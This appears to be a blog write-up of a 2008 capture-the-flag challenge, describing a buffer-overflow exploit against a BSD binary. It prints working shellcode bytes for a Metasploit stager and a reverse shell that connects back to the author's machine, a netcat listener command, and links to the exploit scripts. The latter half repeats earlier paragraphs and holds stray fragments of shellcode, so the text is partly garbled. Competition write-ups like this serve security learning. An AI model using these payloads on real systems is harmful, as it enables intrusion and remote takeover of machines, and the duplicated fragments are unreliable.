The first script uses the EAX found by setting a breakpoint at 0x8048d2f, this is "random" but has massive amounts of collisions when checked against multiple times via Evan's solution write up. So once you break here and check the value of EAX (also whats inside), you'll see your stack, and bingo you can rewrite the EIP and get a shell.
So after breaking here, I found the EAX to be at 0x08054600, so I could use this for my injection into the buffer.
However, because we're restricted to 64 bytes of shellcode space, I opted to use the 43 byte Metasploit Shellcode "bsd_ia32_reverse_stg", which opens up a port that accepts a new shellcode script of any size. So with both of these things in mind, I also filled the buffer with a small NOP sled, just in case I was off by 1, or the memory got close to this point and hit somewhere in the NOPs.
So now my connection string will look like
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x61\x58\x99\x52\x68
\x10\x02\x02\x9a\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99
\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\xb6
\x10\x52\xb0\x1e\xcd\x80\x51\x50\x51\x97\x6a\x03\x58\xcd\x80\xc3
\x00\x46\x05\x08
notice the EIP at the end is reverse, because its reading it in from lowest to highest when you overwrite the EIP. so \x00\x46\x05\x08 = 0x08054600, which is very important.
Now, run this a few times with a python script, and you should have a port on 666 waiting for a new shellcode.
Injecting the new shellcode is easy, I opted for a reverse bind shell that would give me /bin/sh, mostly because I didn't want to leave a port open on the box for other people to connect to.
Using Metasploits opcode generator, I created the following shellcode:
\x2b\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25
\x7a\x72\xb3\x83\xeb\xfc\xe2\xf4\x4f\x1b\x2a\x2a\x77\x38\x20\xf1
\x77\x12\xde\xa3\x2d\x7b\xbf\x33\x4d\x6a\x70\xaa\xaa\xf3\x93\xd9
\x35\x2b\x22\xe2\xb2\x10\x10\xeb\xe8\xfa\x18\xb1\x7c\xca\x28\xe2
\x72\x2b\xbf\x33\x6c\x03\x84\xe3\x4d\x55\x5d\xc0\x4d\x12\x5d\xd1
\x4c\x14\xfb\x50\x75\x2e\x21\xe0\x95\x41\xbf\x33
This code will reverse connect to my IP (local NAT via VMware for now) on port 667, and give me a full access /bin/sh!
So using a shell on my local machine, I setup a netcat to listen via: nc -vvnlp 667 send off my new shellcode to port 666, and with any luck receive a connection on the Netcat, which means I now have owned this box, full root privileges, and am ready to grab the key for the challenge!
Here are some useful links if you want to try it out for yourself (you'll need to modify the shell-script for your desired ports/IPs):
http://www.nopsr.us/ctf2008qual/ - questions
http://www.metasploit.com/shellcode/bsd/ - nice shellcode generators for BSD
http://cthulhu32.kraln.com/ctf2k8/200rwstage1.py - my first script, I run it 300 times to ensure a 666 port
http://cthulhu32.kraln.com/ctf2k8/200rwstage2.py - my second script, connects back to 172.16.8.1 on port 667.
http://syndrowm.com/ctf2008qual/rw200-writeup.txt - Evan's writeup to the problem (he doesn't disclose the EAX location, and my scripts are entirely based on his little connector script.)
The binaries should be posted on Nopsr.us soon, if they don't get them up in the next few days I'll throw Real-World 200 up.
\x77\x12\xde\xa3\x2d\x7b\xbf
\x35\x2b\x22\xe2\xb2\x10\x10
\x72\x2b\xbf\x33\x6c\x03\x84
\x4c\x14\xfb\x50\x75\x2e\x21
This code will reverse connect to my IP (local NAT via VMware for now) on port 667, and give me a full access /bin/sh!
So using a shell on my local machine, I setup a netcat to listen via: nc -vvnlp 667 send off my new shellcode to port 666, and with any luck receive a connection on the Netcat, which means I now have owned this box, full root privileges, and am ready to grab the key for the challenge!
Here are some useful links if you want to try it out for yourself (you'll need to modify the shell-script for your desired ports/IPs):
http://www.nopsr.us/ctf2008qual/ - questions
http://www.metasploit.com/shellcode/bsd/ - nice shellcode generators for BSD
http://cthulhu32.kraln.com/ctf2k8/200rwstage1.py - my first script, I run it 300 times to ensure a 666 port
http://cthulhu32.kraln.com/ctf2k8/200rwstage2.py - my second script, connects back to 172.16.8.1 on port 667.
http://syndrowm.com/ctf2008qual/rw200-writeup.txt - Evan's writeup to the problem (he doesn't disclose the EAX location, and my scripts are entirely based on his little connector script.)
The binaries should be posted on Nopsr.us soon, if they don't get them up in the next few days I'll throw Real-World 200 up.
No comments:
Post a Comment